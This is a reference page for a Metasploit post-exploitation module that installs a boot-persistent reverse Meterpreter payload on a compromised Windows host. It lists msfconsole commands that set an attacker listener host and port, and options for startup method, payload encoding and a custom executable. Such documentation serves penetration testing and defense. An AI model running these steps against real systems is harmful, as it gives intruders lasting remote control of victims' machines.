Windows Manage Persistent Payload Installer
This module creates a boot-persistent reverse Meterpreter session by installing the payload on the target host as a script that is executed at user logon or system startup, depending on privilege and the selected startup method. REXE mode transfers a binary of your choosing to the remote host to be used as the payload.
Rank
- Normal
Authors
- Carlos Perez < carlos_perez [at] darkoperator.com >
- Merlyn drforbin Cousins < drforbin6 [at] gmail.com >
Similar Modules
- post/windows/manage/add_user_domain
- post/windows/manage/autoroute
- post/windows/manage/delete_user
- post/windows/manage/download_exec
- post/windows/manage/enable_rdp
- post/windows/manage/inject_ca
- post/windows/manage/inject_host
- post/windows/manage/migrate
- post/windows/manage/multi_meterpreter_inject
- post/windows/manage/nbd_server
Usage Information
$ msfconsole
msf > use post/windows/manage/persistence
msf post(persistence) > set LHOST [MY IP ADDRESS]
msf post(persistence) > set LPORT [MY LISTENER PORT]
msf post(persistence) > set SESSION [INTEGER]
Module Options
| Option | Description |
|---|---|
| DELAY | Delay in seconds for persistent payload to reconnect. (default: 5) |
| HANDLER | Start a Multi/Handler to Receive the session. (default: true) |
| LHOST | IP for persistent payload to connect to. |
| LPORT | Port for persistent payload to connect to. |
| PAYLOAD_TYPE | Meterpreter Payload Type. (accepted: TCP, HTTP, HTTPS) (default: TCP) |
| REXE | The remote executable to use. (default: ) |
| REXENAME | The name to call exe on remote system (default: ) |
| SESSION | The session to run this module on. |
| STARTUP | Startup type for the persistent payload. (accepted: USER, SYSTEM, SERVICE) (default: USER) |
| TEMPLATE | Alternate template Windows PE File to use. |
| ENCODER | Encoder name to use for encoding. |
| ITERATIONS | Number of iterations for encoding. |
| OPTIONS | Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format. |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
